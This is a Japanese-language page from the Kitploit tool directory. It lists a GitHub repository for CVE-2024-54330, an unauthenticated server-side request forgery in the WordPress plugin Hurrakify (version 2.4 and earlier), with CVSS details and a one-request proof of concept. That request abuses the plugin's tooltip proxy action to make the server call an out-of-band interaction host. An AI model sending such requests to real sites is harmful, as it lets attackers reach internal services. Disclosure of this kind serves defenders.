Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-54330 — Hurrakify <= 2.4 - 未認証のサーバーサイド・リクエスト・フォージェリ | Kitploit
ツール/GitHubGitHub/randomrobbiebf/cve-2024-54330
偵察脆弱性分析ウェブアプリケーション悪用ウェブセキュリティ
GitHubrandomrobbiebf/cve-2024-54330

CVE-2024-54330

Hurrakify <= 2.4 - 未認証のサーバーサイド・リクエスト・フォージェリ

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-54330

Hurrakify <= 2.4 - 認証なしサーバーサイドリクエストフォージェリ

説明

WordPress用プラグインHurrakifyは、バージョン2.4までの全バージョンにおいて、サーバーサイドリクエストフォージェリ(SSRF)の脆弱性の影響を受けます。これにより、認証されていない攻撃者が、Webアプリケーションを起点として任意の場所へのWebリクエストを作成できるようになり、内部サービスの情報を照会・変更するために悪用される可能性があります。

詳細

  • タイプ: プラグイン
  • スラッグ: hurrakify
  • 影響を受けるバージョン: 2.4
  • CVSSスコア: 7.2
  • CVSSレーティング: 高
  • CVSSベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
  • CVE: CVE-2024-54330
  • ステータス: アクティブ

POC

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
root@kitploit:~
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>
ツールをダウンロード